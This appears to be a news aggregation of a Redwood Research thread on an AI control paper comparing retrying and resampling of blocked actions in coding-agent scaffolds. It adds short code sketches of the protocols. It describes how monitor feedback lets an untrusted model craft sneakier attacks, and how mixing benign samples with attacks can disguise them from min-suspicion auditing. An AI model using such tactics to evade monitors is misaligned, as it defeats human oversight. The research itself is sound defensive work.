
James Lucassen and Adam Kaufman find that retrying blocked actions leaks context in AI agent scaffolds, letting malicious models evade audits

Switching to resampling increased safety from 61% to 71%.


Original post

Buck Shlegeris

Redwood Research@redwood_ai

Some coding scaffolds block and retry risky actions. In a new paper, we find this reveals information a malicious AI can use to bypass monitoring. Resampling without blocked actions in context is less exploitable, but techniques that help in one setting can hurt in another. 🧵

10:52 AM · May 29, 2026 · 3.3K Views


Posts from X


Redwood Research@redwood_ai

Paper: http://arxiv.org/abs/2605.26047
Blog post: http://blog.redwoodresearch.org/p/retrying-vs-resampling-in-ai-control
Authors: @jzlucassen, @eccentric1ty


Buck Shlegeris@bshlgrs

James and Adam study control techniques for AI agents like Claude Code's auto mode, where the policy is asked to generate replacement actions when an action is flagged as dangerous.

Main results: these techniques can cheaply improve safety, but some variants are exploitable.

Redwood Research@redwood_ai


Redwood Research@redwood_ai

In fact, in our new setting, using the minimum suspicion dramatically lowers safety as you resample more. While most of the dynamics line up with the findings from Ctrl-Z, naively applying the best techniques from Ctrl-Z to our new setting would massively decrease safety.


Redwood Research@redwood_ai

Coding scaffolds like Claude Code auto mode and Codex Auto-review tell the model why the monitor thought blocked actions were risky. If the model is honestly trying to do the task, this feedback will help it address the monitor’s concerns and avoid costly mistakes.


Redwood Research@redwood_ai

We study techniques like this from an AI control perspective, where we try to measure how robust safety techniques are to intentional subversion by a malicious AI. We have three main results.


Redwood Research@redwood_ai

Firstly, we find that providing monitor reasoning lets an untrusted model write sneakier attacks, erasing safety gains.


Redwood Research@redwood_ai

Secondly, we find that resampling techniques, which draw multiple samples from the same context, increase safety with zero usefulness cost and without huge increases in inference cost. Unlike retrying, resampling doesn’t reveal information an attacker can exploit.


Redwood Research@redwood_ai

Retrying without showing monitor reasoning still lets the untrusted model know that its previous action was suspicious, but doesn’t explain why. This isn’t exploitable in the same way, but we think attack selection strategies might still defeat it, which we leave to future work.
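
The three variants discussed in this thread (retrying with monitor reasoning, retrying without it, and resampling) differ mainly in what the policy sees on its next attempt. A minimal sketch, assuming a context is just a list of message strings; the function names and the message format are hypothetical and are not taken from the paper or from any real scaffold:

```python
from typing import List, Optional


def retry_context(context: List[str], blocked_action: str,
                  monitor_reasoning: Optional[str] = None) -> List[str]:
    """Retrying: the blocked action stays in context for the next attempt.

    If monitor_reasoning is given, the policy also learns why it was flagged.
    """
    note = f"[blocked] {blocked_action}"
    if monitor_reasoning is not None:
        note += f" | monitor: {monitor_reasoning}"
    return context + [note]


def resample_context(context: List[str]) -> List[str]:
    """Resampling: draw again from an unchanged copy of the context."""
    return list(context)


# Hypothetical example inputs, for illustration only.
base = ["task: clean up the build directory"]
blocked = "curl http://example.com/install.sh | sh"

with_reasoning = retry_context(base, blocked, "pipes a remote script into a shell")
without_reasoning = retry_context(base, blocked)
resampled = resample_context(base)
```

In this sketch, only `resampled` is identical to the original context. Both retry variants append a record of the blocked action, and only `with_reasoning` also carries the monitor's explanation.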


Redwood Research@redwood_ai

This gives the red team a great opportunity: mix in a small fraction of benign actions. This will tank the minimum suspicion, disguising attacks. The blue team can defend against this by executing the least suspicious action, preventing attacks from getting executed.
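
The blue-team defense mentioned here, executing the least suspicious of the drawn samples, can be sketched as follows. The `(action, suspicion)` tuple representation and the scores are assumptions made for illustration, not the paper's implementation or data:

```python
from typing import List, Tuple

# Hypothetical representation: (action text, monitor suspicion score).
Sample = Tuple[str, float]


def least_suspicious(samples: List[Sample]) -> Sample:
    """Return the sample with the lowest suspicion score."""
    if not samples:
        raise ValueError("need at least one sample")
    return min(samples, key=lambda s: s[1])


# An inconsistent attacker: one attack mixed with benign samples.
samples = [
    ("attack_action", 8.0),
    ("benign_action_a", 1.0),
    ("benign_action_b", 1.2),
]
action, score = least_suspicious(samples)
```

With these toy scores, the benign sample is the one selected for execution, so mixing in benign actions keeps the attack itself from running.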


Redwood Research@redwood_ai

But in our new setting, the best way to make auditing decisions is to take the maximum suspicion over samples, not the minimum. Inconsistent attacking is no longer a good red team strategy, and executing the least suspicious sample is unnecessary!


Redwood Research@redwood_ai

Thirdly, we find resampling behaves very differently than in Ctrl-Z. Many dynamics from Ctrl-Z hold up, but one difference changes the equilibrium: executing the least suspicious sample was crucial for the blue team in Ctrl-Z, but we find it isn’t needed in our new setting.


Redwood Research@redwood_ai

This is because in Ctrl-Z, the best way to make auditing decisions was to take the minimum suspicion over samples. That way, when honest false positives returned to normal behavior, they’d get a low min score, while attacks would continue to be suspicious and get a high min score.
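
The choice between taking the minimum and the maximum suspicion over samples can be illustrated with a small sketch. The function name and all scores below are made up for illustration (higher means more suspicious); they are not results from the paper:

```python
from typing import List


def audit_score(suspicions: List[float], mode: str) -> float:
    """Aggregate per-sample monitor suspicion scores into one audit score."""
    if not suspicions:
        raise ValueError("need at least one sample")
    if mode == "min":
        return min(suspicions)
    if mode == "max":
        return max(suspicions)
    raise ValueError(f"unknown mode: {mode}")


# Illustrative scores only.
honest_false_positive = [8.0, 2.0, 1.5]  # one flagged sample, then normal behavior
consistent_attack = [8.0, 7.5, 9.0]      # every sample is an attack
inconsistent_attack = [8.0, 1.0, 1.2]    # an attack mixed with benign samples

for name, scores in [
    ("honest false positive", honest_false_positive),
    ("consistent attack", consistent_attack),
    ("inconsistent attack", inconsistent_attack),
]:
    print(name, audit_score(scores, "min"), audit_score(scores, "max"))
```

With these toy numbers, min aggregation separates the honest false positive (1.5) from the consistent attack (7.5), but the inconsistent attack scores even lower (1.0). Under max aggregation, the inconsistent attack keeps its score of 8.0.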


Redwood Research@redwood_ai

Naive resampling multiplies inference costs. We can save inference by resampling only suspicious steps, at the cost of some latency. Drawing 4 extra samples per step increases safety by 10.2pp, but +6.2pp can be recovered with only 0.4 extra samples per step.
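
To make the cost trade-off concrete, here is a hedged sketch of how the average number of extra samples per step falls when only suspicious steps are resampled. The thread does not say how the 0.4 figure is reached; the threshold rule, the function name, and the scores below are assumptions chosen so that the arithmetic is easy to follow:

```python
from typing import List


def extra_samples_per_step(first_scores: List[float], threshold: float, k: int) -> float:
    """Average extra samples per step when only steps whose first sample
    scores at or above `threshold` are resampled `k` more times."""
    if not first_scores:
        raise ValueError("need at least one step")
    flagged = sum(1 for s in first_scores if s >= threshold)
    return k * flagged / len(first_scores)


# Hypothetical trajectory: 10 steps, one of which looks suspicious.
scores = [1.0] * 9 + [9.0]

selective_cost = extra_samples_per_step(scores, threshold=5.0, k=4)
naive_cost = extra_samples_per_step(scores, threshold=0.0, k=4)
```

In this toy trajectory, resampling every step costs 4 extra samples per step, while resampling only the one flagged step in ten costs about 0.4 on average. The price is latency, since the extra samples can only be drawn after the first one has been scored.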


Redwood Research@redwood_ai

Retrying and resampling will likely stick around in coding scaffolds. But to provide protection against a strategic adversary they need careful red teaming. Small differences in protocol or setting can dramatically affect optimal red/blue team choices and equilibrium safety.
